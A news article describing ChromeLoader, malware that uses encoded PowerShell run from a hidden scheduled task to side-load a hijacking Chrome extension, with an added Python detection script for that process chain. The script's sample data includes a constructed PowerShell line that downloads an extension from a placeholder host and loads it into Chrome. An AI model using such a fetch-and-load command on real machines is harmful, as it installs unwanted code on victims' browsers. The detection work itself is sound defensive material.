September 22, 2023



Windows malware injects malicious extensions into Chrome via PowerShell



According to a report by The Register, a Windows malware family called ChromeLoader has recently surfaced; it uses PowerShell to add a malicious extension to the victim's Chrome browser.

The malicious Chrome extension forcibly redirects users to online advertisements to generate revenue for the attackers.

There is also a macOS variant of the malware that uses Bash to achieve the same goal, targeting Safari. Aedan Russell, an engineer at the security firm Red Canary, detailed the malware in a blog post.

ChromeLoader is distributed as an ISO file that looks like a torrent file or a cracked video game.

According to Red Canary, it spreads online through websites and social media such as Twitter, via links or QR codes.


Once downloaded and executed, the .ISO file is mounted as a drive on the victim's machine, which gives the malware its initial access to the system.

The ISO contains an executable that installs ChromeLoader, along with what appears to be a .NET wrapper for the Windows Task Scheduler.

This lets ChromeLoader stay hidden after the initial compromise and maintain persistence on the victim machine.

ChromeLoader persists through scheduled tasks, but it does not create them with the native Windows utility (schtasks.exe).

Instead, it injects into the service host process (svchost.exe) and creates its scheduled task from inside that process.

After the cross-process injection completes, ChromeLoader's scheduled task runs under svchost, which invokes the command interpreter (cmd.exe), which in turn executes a Base64-encoded PowerShell command containing several declared variables.

ChromeLoader then uses PowerShell to check whether its malicious extension is already installed; if the path is not found, it uses wget (in PowerShell, an alias of Invoke-WebRequest) to pull the file from a remote server and loads the contents as a Chrome extension.
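The chain described above (a scheduled task under svchost.exe running cmd.exe, which runs a Base64-encoded PowerShell command that ends up launching Chrome with an extension) leaves a distinctive trail in process-creation telemetry. The following Python script is an added detection example; it is not code from the article or from Red Canary. It decodes PowerShell -EncodedCommand payloads (Base64 over UTF-16LE) and flags the parent/child and command-line combinations that match the described behaviour. The pipe-delimited log format, the sample log lines and the encoded scripts are all constructed for this example.

```python
"""
Added example (not from the original article or Red Canary): detection logic
that reviews process-creation log lines for the ChromeLoader-style chain
svchost.exe -> cmd.exe -> PowerShell -EncodedCommand -> chrome.exe --load-extension.
Log format ("parent|image|command_line") and sample lines are constructed.
"""
import base64
import binascii
import re
from typing import Dict, List, Optional

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...),
# so match "-e<letters>" and then check that it is a prefix of the full name.
_ENC_FLAG = re.compile(r"(?i)(?:^|\s)-(e[a-z]*)\s+([A-Za-z0-9+/=]+)")


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded script behind a PowerShell -EncodedCommand argument, or None."""
    for match in _ENC_FLAG.finditer(cmdline):
        flag, payload = match.group(1).lower(), match.group(2)
        if not "encodedcommand".startswith(flag):
            continue  # e.g. -ExecutionPolicy or -ep, not an encoded command
        try:
            # -EncodedCommand carries Base64 of the script as UTF-16LE text.
            return base64.b64decode(payload, validate=True).decode("utf-16-le")
        except (binascii.Error, UnicodeDecodeError):
            return None  # not valid Base64/UTF-16LE, so nothing to inspect
    return None


def classify(line: str) -> List[str]:
    """Return the names of the ChromeLoader-style behaviours seen in one log line."""
    parent, image, cmdline = line.split("|", 2)
    parent, image = parent.lower(), image.lower()
    findings: List[str] = []
    script = decode_encoded_command(cmdline)
    if script is not None:
        low = script.lower()
        # Encoded PowerShell that references Chrome and --load-extension.
        if "chrome" in low and "--load-extension" in low:
            findings.append("encoded_powershell_loads_chrome_extension")
        # Scheduled task (parent svchost.exe) running cmd.exe with encoded PowerShell.
        if parent == "svchost.exe" and image == "cmd.exe":
            findings.append("scheduled_task_runs_encoded_powershell")
    # PowerShell directly launching Chrome with a side-loaded extension.
    if parent == "powershell.exe" and image == "chrome.exe" and "--load-extension" in cmdline.lower():
        findings.append("powershell_launches_chrome_with_extension")
    return findings


def scan(lines: List[str]) -> Dict[int, List[str]]:
    """Map the index of each suspicious line to its findings."""
    results: Dict[int, List[str]] = {}
    for index, line in enumerate(lines):
        findings = classify(line)
        if findings:
            results[index] = findings
    return results


def _encode_ps(script: str) -> str:
    """Encode a script the way -EncodedCommand expects (used only to build samples)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample scripts; the "suspicious" one mirrors the behaviour in the
# article (check for the extension path, fetch it if missing, load it) and is
# NOT real ChromeLoader code. The hostname is a reserved .invalid placeholder.
SUSPICIOUS_SCRIPT = (
    '$ext = "$env:APPDATA\\ext"; '
    'if (-not (Test-Path $ext)) { wget http://example.invalid/ext.zip -OutFile "$ext.zip" }; '
    'Start-Process chrome.exe "--load-extension=$ext"'
)
BENIGN_SCRIPT = "Get-ChildItem C:\\Temp | Measure-Object"

SAMPLE_LOGS = [
    f"svchost.exe|cmd.exe|cmd.exe /c powershell -WindowStyle Hidden -enc {_encode_ps(SUSPICIOUS_SCRIPT)}",
    f"cmd.exe|powershell.exe|powershell -WindowStyle Hidden -enc {_encode_ps(SUSPICIOUS_SCRIPT)}",
    f"explorer.exe|powershell.exe|powershell.exe -EncodedCommand {_encode_ps(BENIGN_SCRIPT)}",
    "explorer.exe|chrome.exe|chrome.exe --profile-directory=Default",
    "powershell.exe|chrome.exe|chrome.exe --load-extension=C:\\Users\\victim\\AppData\\Roaming\\ext",
]

if __name__ == "__main__":
    for index, findings in scan(SAMPLE_LOGS).items():
        print(f"line {index}: {', '.join(findings)}")
```

Only the three lines that reproduce the described chain are flagged; an encoded but harmless PowerShell command and a normal Chrome launch produce no findings. In a real deployment the same checks would run over Sysmon Event ID 1 or EDR process-creation records, and the svchost.exe parent should be corroborated against the Task Scheduler service rather than taken alone, since legitimate scheduled tasks also run under svchost.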

Once the malicious extension is installed in Chrome, it can carry out its real goal: forcibly modifying the victim's search results and redirecting them to malicious advertising sites.

ChromeLoader also redirects the user when they try to remove the extension, forcing them off the Chrome extensions page.

More generally, PowerShell is a favoured command-execution method for malware because it serves as both a command shell and a script interpreter.

Aedan Russell said: “This is a new way to load malicious extensions into Chrome, and other than ChromeLoader, no other known threat actors are trying to use this PowerShell technique to load malicious browser extensions.”

“However, this technique is well-documented, and it’s often used by developers.”

